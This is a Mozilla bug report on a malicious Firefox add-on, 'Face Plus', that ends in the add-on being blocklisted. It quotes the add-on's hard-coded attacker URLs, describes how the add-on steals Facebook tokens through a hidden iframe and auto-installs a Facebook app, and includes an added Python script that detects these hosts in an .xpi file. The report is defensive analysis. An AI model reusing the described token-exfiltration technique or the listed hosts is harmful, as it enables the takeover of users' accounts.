Malicious "Face Plus" add-on

RESOLVED FIXED

Toolkit :: Blocklisting

People

(Reporter: MarkH, Assigned: jorgev)


Attachments

(1 attachment)

490.38 KB, application/octet-stream
(Reporter)

Description

5 years ago
Created attachment 612702: 20120406_faceplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded from http://install.faceplus.biz/face-plus.xpi

Actual results:

NOTE: Attempting to access any of the JS directly, without a Facebook referer, will get you bounced to http://userscripts.org/scripts/source/61761.user.js, which is the SocialFixer plugin JS.

adobeflashplayer.js:

JS in the add-on; injects http://cdn.faceplus.biz/faceplus.js

faceplus.js:

URLs included at start of script:

var reklam ="http://ads.faceplus.biz/reklam.html?&s&";
var bokcurl='http://faceklenti10.zapto.org/yon.php';
linek=new Array("http://begeni.zapto.org/yon.php","http://faceplus2.mm.am/yon.php","http://faceplus3.mm.am/yon.php","http://faceplus4.mm.am/yon.php","http://faceplus5.mm.am/yon.php","http://faceplus.crabdance.com/yon.php","http://faceplus.uk.to/yon.php","http://faceplus.ignorelist.com/","http://faceplus.strangled.net/","http://faceplus.twilightparadox.com/");

Injects http://graph.facebook.com/<uid>?callback=cins to get your public profile data

Injects http://cdn.faceplus.biz/graph.js or http://faceplus.biz/z.js

Tries to inject http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/04/03/16/1333458695713783.jpg as a script; AWS returns an error


graph.js:

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Injects http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/03/28/19/1332953948955831.jpg as the source of a script tag

Uses local storage to maintain state

z.js:

Can do the following, based on configuration:
like a page
add a subscription
send a friend request
report users as abusive

Auto installs FB App 338319369521728, giving it full access to the user's
account

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Uses local storage to maintain state



Expected results:

It should not steal your tokens and send them to a third party server or install a Facebook app without your consent.
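
The hard-coded endpoints and the injection behaviour described above can be checked for mechanically when triaging a suspect .xpi. The following Python script is an added example, not part of this report or of the add-on: it extracts URLs from each JS file in an .xpi, matches their hosts against the hosts this report names, and flags the remote-script injection and iframe creation the description attributes to the add-on. The embedded SAMPLE_JS is constructed to mirror the quoted declarations, and triage_js / triage_xpi are hypothetical helper names.

```python
import re
import zipfile
from urllib.parse import urlparse

# Hosts named in this report: the install/CDN hosts, the ad and redirect
# endpoints, the token-exfiltration host and the EC2 host used as a script source.
REPORTED_HOSTS = {
    "install.faceplus.biz", "cdn.faceplus.biz", "faceplus.biz", "ads.faceplus.biz",
    "begeni.zapto.org", "faceklenti10.zapto.org",
    "faceplus2.mm.am", "faceplus3.mm.am", "faceplus4.mm.am", "faceplus5.mm.am",
    "faceplus.crabdance.com", "faceplus.uk.to", "faceplus.ignorelist.com",
    "faceplus.strangled.net", "faceplus.twilightparadox.com",
    "ec2-46-137-155-64.eu-west-1.compute.amazonaws.com",
}

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# Behaviours the report describes: remote <script> injection and a hidden iframe.
SCRIPT_INJECT_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
IFRAME_RE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)")

def triage_js(source: str) -> dict:
    """Summarise one JS file: its URLs, which hosts match the report, and DOM injection."""
    urls = sorted(set(URL_RE.findall(source)))
    hosts = {h for h in (urlparse(u).hostname for u in urls) if h}
    return {
        "urls": urls,
        "reported_hosts": sorted(hosts & REPORTED_HOSTS),
        "injects_remote_script": bool(SCRIPT_INJECT_RE.search(source)),
        "creates_iframe": bool(IFRAME_RE.search(source)),
    }

def triage_xpi(path: str) -> dict:
    """Run triage_js over every .js member of an .xpi (a plain zip archive)."""
    with zipfile.ZipFile(path) as xpi:
        return {
            name: triage_js(xpi.read(name).decode("utf-8", "replace"))
            for name in xpi.namelist() if name.endswith(".js")
        }

# Constructed sample mirroring the declarations quoted in the report (not the real file).
SAMPLE_JS = """
var reklam ="http://ads.faceplus.biz/reklam.html?&s&";
var bokcurl='http://faceklenti10.zapto.org/yon.php';
linek=new Array("http://begeni.zapto.org/yon.php","http://faceplus2.mm.am/yon.php");
var s=document.createElement('script'); s.src='http://cdn.faceplus.biz/faceplus.js';
"""
```

Run triage_xpi("face-plus.xpi") on the attached archive to get one summary per script; a non-empty "reported_hosts" list or a true "injects_remote_script" flag is the signal to read that file by hand.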
(Assignee)

Comment 1

5 years ago
ID: {8f42fb8b-b6f6-45de-81c0-d6d39f54f971}
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

5 years ago
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i82
Status: ASSIGNED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit